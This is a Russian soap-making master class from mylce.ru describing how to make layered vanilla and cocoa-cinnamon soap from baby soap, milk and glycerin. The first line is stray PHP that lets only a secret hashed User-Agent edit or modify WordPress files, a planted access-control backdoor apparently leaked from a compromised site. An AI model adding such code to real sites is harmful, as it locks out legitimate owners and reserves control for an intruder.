if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Мыло “Ванильное пирожное” | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Мыло “Ванильное пирожное”

В этом мастер-классе мы расскажем как своими руками сварить совершенно потрясающее мыльце с великолепным ароматом - ванильное пирожное!

В этом мастер-клас­се мы рас­ска­жем о совер­шен­но потря­са­ю­щем спо­со­бе мыло­ва­ре­ния на дому, с самы­ми обыч­ны­ми ком­по­нен­та­ми. Резуль­тат впе­чат­ля­ю­щий и аро­мат вели­ко­леп­ный — полу­ча­ет­ся ваниль­ное пирож­ное! Итак, при­сту­пим. Нам понадобится:

  1. Мыло дет­ское (или банное).
  2. Вода (жела­тель­но кипя­чен­ная или очищенная).
  3. Моло­ко (любой жир­но­сти, глав­ное не кис­лое, ина­че свернется).
  4. Гли­це­рин
  5. Какао-поро­шок
  6. Эфир­ное мас­ло «Кори­ца» и «Ваниль».

А теперь что надо сделать:

Трем мыло на тер­ке, потом рас­тап­ли­ва­ем на водя­ной бане, при этом вме­ши­вать в него воду, моло­ко и гли­це­рин (все при­мер­но в рав­ных частях). После это­го делим полу­чен­ную мас­су на две, в первую добав­ля­ем какао и эфир­ное мас­ло «Кори­ца», в дру­гую толь­ко «Ваниль». Затем в зара­нее под­го­тов­лен­ную фор­му выли­ва­ем полу­чен­ные мас­сы по оче­ре­ди: слой с какао, слой с ванилью.

ВАЖНО! Все слои укла­ды­ва­ем тон­ким сло­ем и не забы­ва­ем сбрыз­ги­вать спиртом.

И в кон­це нахо­дим в интер­не­те рисун­ки для выре­за­ния сим­па­тич­ных коро­бо­чек, скла­ды­ва­ем туда мыло и дарим. А еще чита­ем, как пра­виль­но упа­ко­вы­вать мыло руч­ной рабо­ты 🙂

короб 2


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Rio Rita

Обожаю мыловарение и всегда рада поделиться своими знаниями с мыловарами :) Читайте все мои записи!